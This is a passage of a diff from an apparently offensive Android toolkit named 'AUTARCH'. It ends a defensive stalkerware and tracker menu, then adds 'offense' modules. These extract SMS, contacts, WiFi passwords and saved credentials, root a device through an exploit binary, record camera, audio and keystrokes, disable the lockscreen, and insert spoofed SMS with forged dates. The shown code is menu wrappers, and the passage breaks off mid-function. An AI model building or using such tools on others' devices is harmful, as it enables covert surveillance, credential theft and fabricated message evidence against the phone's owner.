pkg = self._get_package_input()
if not pkg:
return
result = self.mgr.remove_device_admin(self.serial, pkg)
if result.get('ok'):
print(f" Removed device admin: {result.get('message', pkg)}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_remove_cert(self):
if not self._ensure_device():
return
# List certs first
certs = self.mgr.scan_certificates(self.serial).get('certs', [])
if not certs:
print(" No user CA certs to remove.")
return
print(" User CA certificates:")
for i, c in enumerate(certs, 1):
print(f" {i}) {c['hash']}: {c['detail']}")
try:
choice = int(input(" Remove #: ").strip())
if 1 <= choice <= len(certs):
result = self.mgr.remove_ca_cert(self.serial, certs[choice - 1]['hash'])
if result.get('ok'):
print(f" Removed.")
else:
print(f" Error: {result.get('error')}")
except (ValueError, EOFError, KeyboardInterrupt):
pass
def do_clear_proxy(self):
if not self._ensure_device():
return
result = self.mgr.clear_proxy(self.serial)
for r in result.get('results', []):
status = "OK" if r['ok'] else "FAIL"
print(f" [{status}] {r['setting']}")
# ── Shizuku & Shield ────────────────────────────────────────────
def do_shizuku_status(self):
if not self._ensure_device():
return
result = self.mgr.shizuku_status(self.serial)
print(f"\n Shizuku Status:")
print(f" Installed: {result['installed']}")
print(f" Running: {result.get('running', False)}")
print(f" Version: {result.get('version', 'N/A')}")
def do_install_shizuku(self):
if not self._ensure_device():
return
try:
apk = input(" Shizuku APK path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not apk:
return
result = self.mgr.install_shizuku(self.serial, apk)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error')}")
def do_start_shizuku(self):
if not self._ensure_device():
return
result = self.mgr.start_shizuku(self.serial)
if result.get('ok'):
print(f" Shizuku started: {result.get('output', '')}")
else:
print(f" Error: {result.get('error')}")
def do_install_shield(self):
if not self._ensure_device():
return
try:
apk = input(" Shield APK path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not apk:
return
result = self.mgr.install_shield_app(self.serial, apk)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error')}")
def do_configure_shield(self):
    """Read a JSON configuration from the user and push it to the Shield app."""
    # BUGFIX: this module never imports json at top level; the only
    # 'import json' is local to run_interactive and does not reach this
    # method, so json.loads raised NameError. Import it here.
    import json
    if not self._ensure_device():
        return
    print(" Shield Configuration (JSON):")
    try:
        config_str = input(" > ").strip()
        config = json.loads(config_str)
    except (EOFError, KeyboardInterrupt):
        return
    except json.JSONDecodeError:
        print(" Invalid JSON.")
        return
    result = self.mgr.configure_shield(self.serial, config)
    if result.get('ok'):
        print(f" Config sent: {result.get('output', '')}")
    else:
        print(f" Error: {result.get('output', 'Failed')}")
def do_grant_shield_perms(self):
if not self._ensure_device():
return
result = self.mgr.grant_shield_permissions(self.serial)
for p in result.get('granted', []):
print(f" [OK] {p}")
for f in result.get('failed', []):
print(f" [!!] {f['perm']}: {f['error']}")
# ── Tracking Honeypot ─────────────────────────────────────────
def do_honeypot_status(self):
if not self._ensure_device():
return
print(f"\n Checking honeypot status...")
result = self.mgr.honeypot_status(self.serial)
print(f"\n Honeypot Status:")
print(f" Active: {result.get('active', False)}")
print(f" Tier: {result.get('tier', 0)}")
print(f" Ad tracking: {'limited' if result.get('ad_tracking_limited') else 'not limited'}")
print(f" Private DNS: {result.get('private_dns_mode', 'off')}")
if result.get('private_dns_host'):
print(f" DNS host: {result['private_dns_host']}")
protections = result.get('protections', {})
if protections:
print(f" Protections:")
for k, v in protections.items():
print(f" {k}: {v}")
def do_scan_tracker_apps(self):
if not self._ensure_device():
return
print(f"\n Scanning for tracker apps...")
result = self.mgr.scan_tracker_apps(self.serial)
if result.get('error'):
print(f" Error: {result['error']}")
return
found = result.get('found', [])
print(f" Found {len(found)} tracker packages out of {result.get('total', 0)} installed:")
for pkg in found:
print(f" - {pkg}")
if not found:
print(" No known tracker apps found.")
def do_scan_tracker_perms(self):
if not self._ensure_device():
return
print(f"\n Scanning for tracking permissions...")
result = self.mgr.scan_tracker_permissions(self.serial)
apps = result.get('apps', [])
if apps:
print(f" {len(apps)} apps have tracking permissions:")
for app in apps[:30]:
print(f" {app['package']}: {', '.join(app['permissions'])}")
if len(apps) > 30:
print(f" ... and {len(apps) - 30} more")
else:
print(" No apps with tracking permissions found.")
def do_ad_settings(self):
if not self._ensure_device():
return
print(f"\n Ad Tracking Settings:")
result = self.mgr.get_tracking_settings(self.serial)
for name, info in result.items():
print(f" {info.get('description', name)}: {info['value']}")
def do_reset_ad_id(self):
if not self._ensure_device():
return
result = self.mgr.reset_advertising_id(self.serial)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_opt_out_tracking(self):
if not self._ensure_device():
return
result = self.mgr.opt_out_ad_tracking(self.serial)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_set_dns(self):
if not self._ensure_device():
return
print(" Available DNS providers:")
db = self.mgr._load_tracker_domains()
providers = db.get('dns_providers', {})
for name, info in providers.items():
print(f" {name}: {info.get('description', info.get('hostname', ''))}")
try:
provider = input(" Provider name: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not provider:
return
result = self.mgr.set_private_dns(self.serial, provider)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_disable_location(self):
if not self._ensure_device():
return
result = self.mgr.disable_location_accuracy(self.serial)
if result.get('ok'):
print(" WiFi and Bluetooth scanning disabled.")
else:
print(" Some settings failed:")
for r in result.get('results', []):
status = "OK" if r['ok'] else "FAIL"
print(f" [{status}] {r['setting']}")
def do_deploy_hosts(self):
if not self._ensure_device():
return
print(" Deploying hosts blocklist (requires root)...")
result = self.mgr.deploy_hosts_blocklist(self.serial)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_setup_iptables(self):
    """Set up iptables traffic redirection on the device (requires root)."""
    if not self._ensure_device():
        return
    try:
        port_str = input(" Redirect port [9040]: ").strip()
    except (EOFError, KeyboardInterrupt):
        return
    # BUGFIX: non-numeric input previously raised an uncaught ValueError
    # from int(); reject it gracefully instead of crashing the menu.
    try:
        port = int(port_str) if port_str else 9040
    except ValueError:
        print(" Invalid port.")
        return
    result = self.mgr.setup_iptables_redirect(self.serial, port)
    if result.get('ok'):
        print(f" {result['message']}")
    else:
        print(f" Error: {result.get('error', 'Failed')}")
def do_set_fake_location(self):
if not self._ensure_device():
return
try:
lat = float(input(" Latitude: ").strip())
lon = float(input(" Longitude: ").strip())
except (ValueError, EOFError, KeyboardInterrupt):
print(" Invalid coordinates.")
return
result = self.mgr.set_fake_location(self.serial, lat, lon)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_random_location(self):
if not self._ensure_device():
return
result = self.mgr.set_random_fake_location(self.serial)
if result.get('ok'):
print(f" {result['message']}")
if result.get('location_name'):
print(f" Location: {result['location_name']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_rotate_identity(self):
if not self._ensure_device():
return
result = self.mgr.rotate_device_identity(self.serial)
if result.get('ok'):
print(f" {result['message']}")
for c in result.get('changes', []):
status = "OK" if c['ok'] else "FAIL"
print(f" [{status}] {c['setting']}: {c['value']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_fake_fingerprint(self):
if not self._ensure_device():
return
result = self.mgr.generate_fake_fingerprint(self.serial)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_activate_honeypot(self):
if not self._ensure_device():
return
print(" Select protection tier:")
print(" 1) ADB only (no root)")
print(" 2) ADB + Shizuku")
print(" 3) Full (ADB + Shizuku + Root)")
try:
tier = int(input(" Tier [1]: ").strip() or '1')
except (ValueError, EOFError, KeyboardInterrupt):
return
if tier not in (1, 2, 3):
print(" Invalid tier.")
return
print(f"\n Activating Tier {tier} honeypot...")
result = self.mgr.honeypot_activate(self.serial, tier)
print(f" {result.get('summary', 'Done')}")
for action in result.get('actions', []):
r = action['result']
status = "OK" if r.get('ok', False) else "FAIL"
msg = r.get('message', r.get('error', ''))
print(f" [{status}] {action['name']}: {msg}")
def do_deactivate_honeypot(self):
if not self._ensure_device():
return
print(" Deactivating honeypot...")
result = self.mgr.honeypot_deactivate(self.serial)
for action in result.get('actions', []):
r = action['result']
status = "OK" if r.get('ok', False) else "FAIL"
print(f" [{status}] {action['name']}")
print(" Honeypot deactivated.")
def do_tracker_stats(self):
stats = self.mgr.get_tracker_stats()
print(f"\n Tracker Domain Database:")
print(f" Version: {stats['version']}")
print(f" Total domains: {stats['total_domains']}")
print(f" Companies: {stats['companies']}")
print(f" Tracker pkgs: {stats['packages']}")
print(f" DNS providers: {', '.join(stats.get('dns_providers', []))}")
print(f" Categories:")
for cat, count in stats.get('categories', {}).items():
print(f" {cat}: {count} domains")
def do_update_trackers(self):
print(" Updating tracker domains...")
result = self.mgr.update_tracker_domains()
if result.get('ok'):
print(f" Updated: merged {result['merged']} new domains")
else:
print(f" Error: {result.get('error')}")
# ── Database ────────────────────────────────────────────────────
def do_sig_stats(self):
stats = self.mgr.get_signature_stats()
print(f"\n Signature Database Stats:")
print(f" Version: {stats['version']}")
print(f" Last updated: {stats['last_updated']}")
print(f" Stalkerware families: {stats['stalkerware_families']}")
print(f" Stalkerware packages: {stats['stalkerware_packages']}")
print(f" Government spyware: {stats['government_spyware']}")
print(f" Permission combos: {stats['permission_combos']}")
def do_update_sigs(self):
print(" Updating signatures from GitHub...")
result = self.mgr.update_signatures()
if result.get('ok'):
print(f" Updated: merged {result['merged']} new packages")
else:
print(f" Error: {result.get('error')}")
# ── Main Loop ───────────────────────────────────────────────────
def run_interactive(self):
    """Main menu loop: show the protection menu and dispatch until exit.

    Fix: removed the dead function-local ``import json`` -- json is not
    used in this function, and a local import here does not make the name
    available to other methods that need it.
    """
    # Dispatch table is invariant, so build it once outside the loop.
    actions = {
        '1': self.do_quick_scan,
        '2': self.do_full_scan,
        '3': self.do_export_report,
        '10': self.do_scan_stalkerware,
        '11': self.do_scan_hidden,
        '12': self.do_scan_admins,
        '13': self.do_scan_accessibility,
        '14': self.do_scan_listeners,
        '15': self.do_scan_spyware,
        '16': self.do_scan_integrity,
        '17': self.do_scan_processes,
        '18': self.do_scan_certs,
        '19': self.do_scan_network,
        '20': self.do_scan_devopt,
        '30': self.do_dangerous_apps,
        '31': self.do_analyze_perms,
        '32': self.do_perm_heatmap,
        '40': self.do_disable,
        '41': self.do_uninstall,
        '42': self.do_revoke,
        '43': self.do_remove_admin,
        '44': self.do_remove_cert,
        '45': self.do_clear_proxy,
        '50': self.do_shizuku_status,
        '51': self.do_install_shizuku,
        '52': self.do_start_shizuku,
        '53': self.do_install_shield,
        '54': self.do_configure_shield,
        '55': self.do_grant_shield_perms,
        '60': self.do_sig_stats,
        '61': self.do_update_sigs,
        '70': self.do_honeypot_status,
        '71': self.do_scan_tracker_apps,
        '72': self.do_scan_tracker_perms,
        '73': self.do_ad_settings,
        '74': self.do_reset_ad_id,
        '75': self.do_opt_out_tracking,
        '76': self.do_set_dns,
        '77': self.do_disable_location,
        '78': self.do_deploy_hosts,
        '79': self.do_setup_iptables,
        '80': self.do_set_fake_location,
        '81': self.do_random_location,
        '82': self.do_rotate_identity,
        '83': self.do_fake_fingerprint,
        '84': self.do_activate_honeypot,
        '85': self.do_deactivate_honeypot,
        '86': self.do_tracker_stats,
        '87': self.do_update_trackers,
        's': self._pick_device,
    }
    while True:
        self.show_menu()
        try:
            choice = input(" Select > ").strip()
        except (EOFError, KeyboardInterrupt):
            break
        if choice == '0':
            break
        action = actions.get(choice)
        if action:
            action()
        else:
            print(" Invalid choice.")
def run():
ap = AndroidProtect()
ap.run_interactive()

221
modules/android_recon.py Normal file
View File

@@ -0,0 +1,221 @@
"""
Android Device Reconnaissance - Extract device data, accounts, messages, history
"""
DESCRIPTION = "Android device reconnaissance (data extraction, accounts, logs)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidRecon:
"""Interactive menu for Android device reconnaissance."""
def __init__(self):
from core.android_exploit import get_exploit_manager
from core.hardware import get_hardware_manager
self.mgr = get_exploit_manager()
self.hw = get_hardware_manager()
self.serial = None
def _select_device(self):
devices = self.hw.adb_devices()
if not devices:
print(" No ADB devices connected.")
return
if len(devices) == 1:
self.serial = devices[0]['serial']
print(f" Selected: {self.serial}")
return
print("\n Select device:")
for i, d in enumerate(devices, 1):
model = d.get('model', '')
print(f" {i}) {d['serial']} {model}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.serial = devices[choice - 1]['serial']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.serial:
self._select_device()
return self.serial is not None
def show_menu(self):
print(f"\n{'='*50}")
print(" Device Reconnaissance")
print(f"{'='*50}")
print(f" Device: {self.serial or '(none)'}")
print()
print(" [1] Full Device Dump")
print(" [2] Installed Accounts")
print(" [3] WiFi Passwords [ROOT]")
print(" [4] Call Logs")
print(" [5] SMS Messages")
print(" [6] Contacts")
print(" [7] Browser History [ROOT]")
print(" [8] Saved Credentials [ROOT]")
print(" [9] Export Full Report")
print(" [s] Select Device")
print(" [0] Back")
print()
def device_dump(self):
if not self._ensure_device():
return
print(" Running full device dump...")
dump = self.mgr.full_device_dump(self.serial)
print(f"\n SELinux: {dump.get('selinux', 'unknown')}")
print(f" Kernel: {dump.get('kernel', 'unknown')}")
print(f" Fingerprint: {dump.get('fingerprint', 'unknown')}")
print(f" Packages: {dump.get('package_count', '?')}")
info = dump.get('device_info', {})
if info:
print(f"\n Device Info:")
for k, v in info.items():
print(f" {k:<20} {v}")
def accounts(self):
if not self._ensure_device():
return
result = self.mgr.get_accounts(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} accounts:")
for a in result['accounts']:
print(f" {a['name']} ({a['type']})")
def wifi_passwords(self):
if not self._ensure_device():
return
print(" Extracting WiFi passwords (requires root)...")
result = self.mgr.get_wifi_passwords(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} saved networks:")
for w in result['passwords']:
print(f" SSID: {w['ssid']}")
print(f" PSK: {w['password']}")
print()
def call_logs(self):
if not self._ensure_device():
return
result = self.mgr.extract_call_logs(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} call log entries:")
print(f" {'Number':<20} {'Type':<12} {'Duration'}")
print(f" {'-'*50}")
for c in result['calls'][:50]:
print(f" {c.get('number','?'):<20} {c.get('type_label','?'):<12} {c.get('duration','?')}s")
def sms_messages(self):
if not self._ensure_device():
return
result = self.mgr.extract_sms(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} SMS messages:")
for m in result['messages'][:30]:
print(f"\n [{m.get('type_label','?')}] {m.get('address','?')}")
body = m.get('body', '')
if len(body) > 100:
body = body[:100] + '...'
print(f" {body}")
def contacts(self):
if not self._ensure_device():
return
result = self.mgr.extract_contacts(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} contacts:")
print(f" {'Name':<25} {'Number'}")
print(f" {'-'*45}")
for c in result['contacts']:
print(f" {c.get('display_name','?'):<25} {c.get('number','?')}")
def browser_history(self):
if not self._ensure_device():
return
print(" Extracting browser history (requires root)...")
result = self.mgr.extract_browser_history(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} history entries:")
for h in result['history'][:30]:
title = h.get('title', '')[:50]
print(f" {title}")
print(f" {h['url']}")
def saved_credentials(self):
if not self._ensure_device():
return
print(" Extracting saved credentials (requires root)...")
result = self.mgr.extract_saved_credentials(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} saved credentials:")
for c in result['credentials']:
print(f" URL: {c['url']}")
print(f" User: {c['username']}")
print(f" Pass: {'[encrypted]' if c['password_encrypted'] else '[empty]'}")
print()
def export_report(self):
if not self._ensure_device():
return
print(" Generating full recon report...")
result = self.mgr.export_recon_report(self.serial)
if result['success']:
print(f" Report saved: {result['report_path']}")
print(f" Sections: {', '.join(result['sections'])}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
actions = {
'0': None,
'1': self.device_dump,
'2': self.accounts,
'3': self.wifi_passwords,
'4': self.call_logs,
'5': self.sms_messages,
'6': self.contacts,
'7': self.browser_history,
'8': self.saved_credentials,
'9': self.export_report,
's': self._select_device,
}
if choice == '0':
break
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
m = AndroidRecon()
m.run_interactive()

163
modules/android_root.py Normal file
View File

@@ -0,0 +1,163 @@
"""
Android Root Methods - Root detection, Magisk install, exploit-based rooting
"""
DESCRIPTION = "Android root methods (Magisk, exploits, root detection)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidRoot:
"""Interactive menu for Android rooting operations."""
def __init__(self):
from core.android_exploit import get_exploit_manager
from core.hardware import get_hardware_manager
self.mgr = get_exploit_manager()
self.hw = get_hardware_manager()
self.serial = None
def _select_device(self):
devices = self.hw.adb_devices()
if not devices:
print(" No ADB devices connected.")
return
if len(devices) == 1:
self.serial = devices[0]['serial']
print(f" Selected: {self.serial}")
return
print("\n Select device:")
for i, d in enumerate(devices, 1):
model = d.get('model', '')
print(f" {i}) {d['serial']} {model}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.serial = devices[choice - 1]['serial']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.serial:
self._select_device()
return self.serial is not None
def show_menu(self):
print(f"\n{'='*50}")
print(" Root Methods")
print(f"{'='*50}")
print(f" Device: {self.serial or '(none)'}")
print()
print(" [1] Check Root Status")
print(" [2] Install Magisk APK")
print(" [3] Pull Patched Boot Image")
print(" [4] Root via Exploit")
print(" [5] ADB Root Shell (debug builds)")
print(" [s] Select Device")
print(" [0] Back")
print()
def check_root(self):
if not self._ensure_device():
return
print(" Checking root status...")
result = self.mgr.check_root(self.serial)
print(f"\n Rooted: {'YES' if result['rooted'] else 'NO'}")
if result['method']:
print(f" Method: {result['method']}")
if result['version']:
print(f" Version: {result['version']}")
details = result.get('details', {})
if details:
print(f" Details:")
for k, v in details.items():
print(f" {k}: {v}")
def install_magisk(self):
if not self._ensure_device():
return
try:
apk = input(" Magisk APK path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not apk:
return
print(" Installing Magisk APK...")
result = self.mgr.install_magisk(self.serial, apk)
if result['success']:
print(" Magisk installed successfully.")
print(" Next: Open Magisk app, patch boot image, then flash patched boot.")
else:
print(f" Error: {result.get('error', result.get('output', 'Failed'))}")
def pull_patched(self):
if not self._ensure_device():
return
print(" Looking for patched boot image...")
result = self.mgr.pull_patched_boot(self.serial)
if result['success']:
size_mb = result['size'] / (1024 * 1024)
print(f" Saved: {result['local_path']} ({size_mb:.1f} MB)")
print(" Next: Reboot to fastboot, flash this as boot partition.")
else:
print(f" Error: {result.get('error', 'Failed')}")
def root_exploit(self):
if not self._ensure_device():
return
try:
exploit = input(" Exploit binary path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not exploit:
return
print(" Deploying and executing exploit...")
result = self.mgr.root_via_exploit(self.serial, exploit)
if result['success']:
print(" ROOT OBTAINED!")
else:
print(" Root not obtained.")
print(f" Exploit output:\n{result.get('exploit_output', '')}")
def adb_root(self):
if not self._ensure_device():
return
print(" Attempting adb root (userdebug/eng builds only)...")
result = self.mgr.adb_root_shell(self.serial)
if result['success']:
print(" ADB running as root.")
else:
print(f" Failed: {result['output']}")
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
actions = {
'1': self.check_root,
'2': self.install_magisk,
'3': self.pull_patched,
'4': self.root_exploit,
'5': self.adb_root,
's': self._select_device,
}
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
m = AndroidRoot()
m.run_interactive()

220
modules/android_screen.py Normal file
View File

@@ -0,0 +1,220 @@
"""
Android Screen & Input Control - Screenshots, recording, input injection, keylogger
"""
DESCRIPTION = "Android screen capture, input injection, keylogger, camera/audio"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidScreen:
"""Interactive menu for screen/input/capture operations."""
def __init__(self):
from core.android_exploit import get_exploit_manager
from core.hardware import get_hardware_manager
self.mgr = get_exploit_manager()
self.hw = get_hardware_manager()
self.serial = None
def _select_device(self):
devices = self.hw.adb_devices()
if not devices:
print(" No ADB devices connected.")
return
if len(devices) == 1:
self.serial = devices[0]['serial']
print(f" Selected: {self.serial}")
return
print("\n Select device:")
for i, d in enumerate(devices, 1):
print(f" {i}) {d['serial']} {d.get('model','')}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.serial = devices[choice - 1]['serial']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.serial:
self._select_device()
return self.serial is not None
def show_menu(self):
print(f"\n{'='*55}")
print(" Screen & Input Control")
print(f"{'='*55}")
print(f" Device: {self.serial or '(none)'}")
print()
print(" ── Capture ──")
print(" [1] Screenshot")
print(" [2] Screen Record")
print(" [3] Camera Photo")
print(" [4] Audio Record")
print()
print(" ── Input Injection ──")
print(" [5] Tap Coordinates")
print(" [6] Swipe")
print(" [7] Type Text")
print(" [8] Send Key Event")
print(" [9] Wake / Dismiss Lockscreen")
print(" [10] Disable Lockscreen")
print()
print(" ── Keylogger ──")
print(" [11] Start Keylogger")
print(" [12] Stop & Pull Keylog")
print()
print(" [s] Select Device")
print(" [0] Back")
print()
def screenshot(self):
if not self._ensure_device(): return
print(" Capturing screenshot...")
r = self.mgr.screen_capture(self.serial)
if r['success']:
print(f" Saved: {r['path']} ({r['size']} bytes)")
else:
print(f" Error: {r.get('error')}")
def screen_record(self):
if not self._ensure_device(): return
try:
dur = input(" Duration in seconds [10]: ").strip()
dur = int(dur) if dur else 10
except (ValueError, EOFError, KeyboardInterrupt):
return
print(f" Recording for {dur}s...")
r = self.mgr.screen_record(self.serial, duration=dur)
if r['success']:
print(f" Saved: {r['path']} ({r['size']} bytes)")
else:
print(f" Error: {r.get('error')}")
def camera(self):
if not self._ensure_device(): return
try:
cam = input(" Camera [back/front]: ").strip() or 'back'
except (EOFError, KeyboardInterrupt):
return
print(" Opening camera (device screen will activate)...")
r = self.mgr.camera_capture(self.serial, camera=cam)
if r['success']:
print(f" Photo saved: {r['path']}")
else:
print(f" Note: {r.get('error')}")
def audio(self):
if not self._ensure_device(): return
try:
dur = input(" Duration in seconds [10]: ").strip()
dur = int(dur) if dur else 10
except (ValueError, EOFError, KeyboardInterrupt):
return
r = self.mgr.audio_record(self.serial, duration=dur)
print(f" {r.get('note', 'Started')}")
def tap(self):
if not self._ensure_device(): return
try:
x = int(input(" X coordinate: ").strip())
y = int(input(" Y coordinate: ").strip())
except (ValueError, EOFError, KeyboardInterrupt):
return
self.mgr.input_tap(self.serial, x, y)
print(f" Tapped ({x}, {y})")
def swipe(self):
if not self._ensure_device(): return
try:
x1 = int(input(" From X: ").strip())
y1 = int(input(" From Y: ").strip())
x2 = int(input(" To X: ").strip())
y2 = int(input(" To Y: ").strip())
ms = input(" Duration ms [300]: ").strip()
ms = int(ms) if ms else 300
except (ValueError, EOFError, KeyboardInterrupt):
return
self.mgr.input_swipe(self.serial, x1, y1, x2, y2, ms)
print(f" Swiped ({x1},{y1}) -> ({x2},{y2})")
def type_text(self):
if not self._ensure_device(): return
try:
text = input(" Text to type: ").strip()
except (EOFError, KeyboardInterrupt):
return
if text:
self.mgr.input_text(self.serial, text)
print(f" Typed: {text[:50]}")
def keyevent(self):
if not self._ensure_device(): return
print(" Common: 3=HOME 4=BACK 26=POWER 82=MENU 24/25=VOL 187=RECENTS 224=WAKEUP")
try:
code = input(" Keycode: ").strip()
except (EOFError, KeyboardInterrupt):
return
if code:
self.mgr.input_keyevent(self.serial, code)
print(f" Sent keyevent {code}")
def wake_dismiss(self):
if not self._ensure_device(): return
r = self.mgr.dismiss_lockscreen(self.serial)
print(f" Lock screen: {'still locked' if r['locked'] else 'dismissed'}")
def disable_lock(self):
if not self._ensure_device(): return
r = self.mgr.disable_lockscreen(self.serial)
print(" Attempted lock screen disable:")
for x in r['results']:
print(f" {x['cmd']}: rc={x['rc']}")
def start_keylog(self):
if not self._ensure_device(): return
r = self.mgr.start_keylogger(self.serial)
print(f" Keylogger started, PID: {r['pid']}, log: {r['log_path']}")
def stop_keylog(self):
if not self._ensure_device(): return
r = self.mgr.stop_keylogger(self.serial)
if r['success']:
print(f" Keylog saved: {r['path']} ({r['size']} bytes)")
else:
print(f" {r.get('error')}")
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
actions = {
'1': self.screenshot, '2': self.screen_record,
'3': self.camera, '4': self.audio,
'5': self.tap, '6': self.swipe,
'7': self.type_text, '8': self.keyevent,
'9': self.wake_dismiss, '10': self.disable_lock,
'11': self.start_keylog, '12': self.stop_keylog,
's': self._select_device,
}
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
m = AndroidScreen()
m.run_interactive()

359
modules/android_sms.py Normal file
View File

@@ -0,0 +1,359 @@
"""
Android SMS/RCS Manipulation - Insert, delete, spoof messages with custom timestamps
"""
DESCRIPTION = "Android SMS/RCS manipulation (add, remove, spoof dates, RCS inject)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidSms:
"""Interactive menu for SMS/RCS manipulation."""
def __init__(self):
from core.android_exploit import get_exploit_manager
from core.hardware import get_hardware_manager
self.mgr = get_exploit_manager()
self.hw = get_hardware_manager()
self.serial = None
def _select_device(self):
devices = self.hw.adb_devices()
if not devices:
print(" No ADB devices connected.")
return
if len(devices) == 1:
self.serial = devices[0]['serial']
print(f" Selected: {self.serial}")
return
print("\n Select device:")
for i, d in enumerate(devices, 1):
model = d.get('model', '')
print(f" {i}) {d['serial']} {model}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.serial = devices[choice - 1]['serial']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.serial:
self._select_device()
return self.serial is not None
def show_menu(self):
print(f"\n{'='*55}")
print(" SMS / RCS Manipulation")
print(f"{'='*55}")
print(f" Device: {self.serial or '(none)'}")
print()
print(" ── SMS (content provider) ──")
print(" [1] List SMS Messages")
print(" [2] Insert SMS (spoofed)")
print(" [3] Insert Batch SMS")
print(" [4] Edit SMS")
print(" [5] Delete SMS by ID")
print(" [6] Delete SMS by Number")
print(" [7] Delete ALL SMS")
print()
print(" ── RCS (Google Messages) ── [ROOT]")
print(" [8] Check RCS Support")
print(" [9] List RCS Messages")
print(" [a] Insert RCS Message (spoofed)")
print(" [b] Delete RCS Message")
print()
print(" [s] Select Device")
print(" [0] Back")
print()
def list_sms(self):
if not self._ensure_device():
return
try:
addr = input(" Filter by number (Enter for all): ").strip() or None
limit = input(" Limit [50]: ").strip()
limit = int(limit) if limit else 50
except (EOFError, KeyboardInterrupt, ValueError):
return
result = self.mgr.sms_list(self.serial, limit=limit, address=addr)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} messages:")
print(f" {'ID':<6} {'Type':<8} {'Address':<16} {'Date':<20} Body")
print(f" {'-'*75}")
for m in result['messages']:
body = m.get('body', '')
if len(body) > 40:
body = body[:40] + '...'
date = m.get('date_readable', m.get('date', '?'))
print(f" {m.get('_id','?'):<6} {m.get('type_label','?'):<8} {m.get('address','?'):<16} {date:<20} {body}")
def insert_sms(self):
if not self._ensure_device():
return
try:
print("\n Insert Spoofed SMS")
print(f" {'-'*40}")
address = input(" Phone number: ").strip()
if not address:
return
body = input(" Message body: ").strip()
if not body:
return
print(" Type: 1=inbox (received), 2=sent, 3=draft")
msg_type = input(" Type [inbox]: ").strip() or 'inbox'
date = input(" Date (YYYY-MM-DD) [today]: ").strip() or None
time_val = input(" Time (HH:MM:SS) [now]: ").strip() or None
read = input(" Mark as read? [Y/n]: ").strip().lower() != 'n'
except (EOFError, KeyboardInterrupt):
return
print(" Inserting...")
result = self.mgr.sms_insert(self.serial, address, body,
date_str=date, time_str=time_val,
msg_type=msg_type, read=read)
if result['success']:
print(f" SMS inserted:")
print(f" From/To: {result['address']}")
print(f" Date: {result['date']}")
print(f" Type: {result['type']}")
print(f" Body: {result['body'][:60]}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def insert_batch(self):
if not self._ensure_device():
return
print("\n Batch SMS Insert")
print(" Enter messages one per line. Format:")
print(" number|body|YYYY-MM-DD|HH:MM:SS|type")
print(" Type is inbox/sent. Date/time optional. Empty line to finish.")
print()
messages = []
while True:
try:
line = input(" > ").strip()
except (EOFError, KeyboardInterrupt):
break
if not line:
break
parts = line.split('|')
if len(parts) < 2:
print(" Need at least: number|body")
continue
